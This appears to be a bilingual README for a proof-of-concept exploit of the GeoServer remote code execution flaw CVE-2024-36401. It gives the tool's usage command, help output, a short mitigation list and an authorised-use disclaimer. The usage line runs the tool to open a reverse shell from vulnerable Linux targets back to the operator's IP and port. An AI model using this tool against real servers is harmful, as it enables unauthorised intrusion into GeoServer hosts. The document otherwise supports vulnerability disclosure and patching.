
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
POC pour CVE-2024-36401 GeoServer. Ce POC tentera d'établir un reverse shell système depuis les cibles.

POC pour CVE-2024-36401 : RCE pour les versions de GeoServer antérieures à 2.25.1, 2.24.3 et 2.23.5. Ce POC est basé sur l'avis de sécurité de phith0n.
Ce POC tentera d'établir un reverse shell depuis les cibles vulnérables. Il est conçu pour fonctionner contre des cibles Linux vulnérables. Vous devez disposer d'une machine avec une IP publiée et accessible pour exécuter ce POC.
requestsPour utiliser ce POC contre une seule cible :
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Aide :
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- Désactivez les requêtes WFS.
2- Sécurisez votre Linux en configurant iptables pour désactiver les connexions inverses, définir des politiques par défaut pour bloquer tout le trafic, autoriser les connexions établies et associées, et n'autoriser que le trafic sortant essentiel comme DNS, HTTP et HTTPS.
3- Ou mettez à jour vers la dernière version de GeoServer.
Pour toute suggestion ou réflexion, veuillez me contacter moi.
J'aime créer mes propres outils pour le plaisir, le travail et à des fins éducatives uniquement. Je ne soutiens ni n'encourage le piratage ou l'accès non autorisé à un système ou réseau. Veuillez utiliser mes outils de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation claire de tester.